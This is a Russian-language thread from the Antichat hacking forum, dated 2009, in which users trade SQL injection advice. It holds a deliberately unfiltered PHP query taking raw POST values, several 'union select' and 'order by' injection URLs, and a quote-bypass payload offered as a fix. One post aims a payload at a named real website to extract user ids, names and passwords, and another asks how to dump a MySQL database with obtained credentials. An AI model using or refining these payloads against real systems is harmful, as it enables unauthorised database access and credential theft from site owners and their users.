Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.12.2009, 16:29
|
|
Новичок
Регистрация: 07.11.2009
Сообщений: 23
Провел на форуме:
189458
Репутация:
10
|
|
Можно ли провести здесь скулю?
PHP код:
$res=mysql_query("update peolpe set name='".$_POST["name"]."' where id='".$_POST["id"]."'");
Переменные name и id не фильтруются... |
|
|
16.12.2009, 16:32
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
https://forum.antichat.ru/thread35207.html
|
|
|
|
16.12.2009, 19:34
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
http://localhost/script.asp?id=1%2Border%2Bby%2B100#
PHP код:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'order'.
http://localhost/?page=%2Fmediascan%2Fnews%2Easp
PHP код:
Microsoft OLE DB Provider for SQL Server error '80040e10'
Procedure or function 'USP_GetMoreOverNewsByIDStory' expects parameter '@id_stories', which was not supplied.
есть ли тут скул или просто ошибка, вроде на order by ругается и на все что после asp?id=1
|
|
|
|
16.12.2009, 20:41
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от Strilo4ka
YuNi|[c
https://forum.antichat.ru/thread50550-OLE.html
спс за ответ но тут не access а mssql если не ошибаюсь.
Видимо тут просто ошибкабд и скулей врядли.
все равно спс
|
|
|
|
17.12.2009, 04:38
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
http://localhost/s.html?action='%20union%20select%201,2,3333%20from %20BJWSAPages%00
прошу помочь никак не могу удалит одинарную кавычку. Если убрат идет ошибка
|
|
|
|
17.12.2009, 04:42
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
1' union select 1,2,3 from table where '1'='1
|
|
|
|
17.12.2009, 07:23
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от Spyder
1' union select 1,2,3 from table where '1'='1
помогло спс тока без кавычег 1=1
Теперь брутит до брутит наверное или можно сначала имя дб вывести?
|
|
|
|
17.12.2009, 20:36
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479
Репутация:
1809
|
|
Добрый вечер!
Подскажите пожалуйста, как сделать дамп базы данных MySQL имея логин и пароль от базы, а так же имя сайта.
Дело в том, что domain: SITE.RU и nserver: ns1.site.ru один и тот же. Я так понял, что у них теперь свой сервер? Раньше они хостились на masterhost.ru, там был путь: https://phpmyadmin.masterhost.ru и я делал дамп, но теперь пишет:
phpMyAdmin - Ошибка
#2005 - Unknown MySQL server host 'admin.mysql.masterhost.ru' (1)
Что же делать? Как сделать дамп? |
|
|
|
17.12.2009, 21:46
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
http://www.section404.org/news.php?id=-1%20union%20select%201,2,3,group_concat(id,0x3a,na me,0x3a,password),5,6+from+users--
за4ем так полу4ается ??
не показовает//
|
|
|
|
17.12.2009, 22:07
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от LokbatanLi
за4ем так полу4ается ??
не показовает//
Потому что таблички users не существует...
PS: Раздражают такие люди, которые любят "п0нт@нутьSя"...
Последний раз редактировалось mailbrush; 17.12.2009 в 22:09..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Forest]](/avatars/avatar103206.gif){kind=avatar}
Похожие темы
Линейный вид
